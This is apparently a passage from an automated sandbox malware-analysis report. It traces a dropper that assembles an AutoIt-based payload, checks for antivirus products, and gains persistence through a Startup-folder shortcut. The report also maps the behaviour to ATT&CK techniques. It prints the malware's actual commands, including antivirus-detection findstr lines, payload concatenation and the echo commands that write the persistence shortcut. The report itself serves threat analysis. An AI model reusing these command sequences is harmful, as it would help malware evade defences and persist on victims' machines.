Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ldqj18tn.exeStatic file information: File size 1656911 > 1048576
Source: ldqj18tn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F18B75 push ecx; ret 11_2_00F18B88
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D8CBDB push eax; retf 17_2_00D8CBF8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D98B75 push ecx; ret 17_2_00D98B88

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00F759B3
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F05EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00F05EDA
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DF59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_00DF59B3
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D85EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00D85EDA
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F133B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00F133B7
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_11-100421
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifAPI coverage: 4.9 %
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrAPI coverage: 4.7 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F54005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00F54005
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00F5494A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F53CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00F53CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00F5C2FF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00F5CD9F
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5CD14 FindFirstFileW,FindClose,11_2_00F5CD14
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00F5F5D8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00F5F735
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F5FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00F5FA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00DD4005
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_00DD494A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00DDC2FF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_00DDCD9F
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDCD14 FindFirstFileW,FindClose,17_2_00DDCD14
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00DDF5D8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00DDF735
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_00DDFA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DD3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00DD3CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F05D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00F05D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.4004946985.0000000003F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F645D5 BlockInput,11_2_00F645D5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00F05240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F25CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00F25CAC
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F488CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00F488CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00F1A385
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1A354 SetUnhandledExceptionFilter,11_2_00F1A354
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00D9A385
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00D9A354 SetUnhandledExceptionFilter,17_2_00D9A354
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F49369 LogonUserW,11_2_00F49369
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F05240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00F05240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F51AC6 SendInput,keybd_event,11_2_00F51AC6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F551E2 mouse_event,11_2_00F551E2
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exit
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F488CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00F488CD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F54F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00F54F1C
Source: ldqj18tn.exe, 00000000.00000003.2138986925.00000000029D2000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196672536.000000000427A000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Organizational.pif, InnoMesh.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F1885B cpuid 11_2_00F1885B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F30030 GetLocalTime,__swprintf,11_2_00F30030
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F30722 GetUserNameW,11_2_00F30722
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F2416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_00F2416A
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: InnoMesh.scrBinary or memory string: WIN_81
Source: InnoMesh.scrBinary or memory string: WIN_XP
Source: InnoMesh.scrBinary or memory string: WIN_XPe
Source: InnoMesh.scrBinary or memory string: WIN_VISTA
Source: InnoMesh.scrBinary or memory string: WIN_7
Source: InnoMesh.scrBinary or memory string: WIN_8
Source: InnoMesh.scr.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F6696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00F6696E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00F66E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00F66E32
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DE696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_00DE696E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00DE6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00DE6E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials4
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
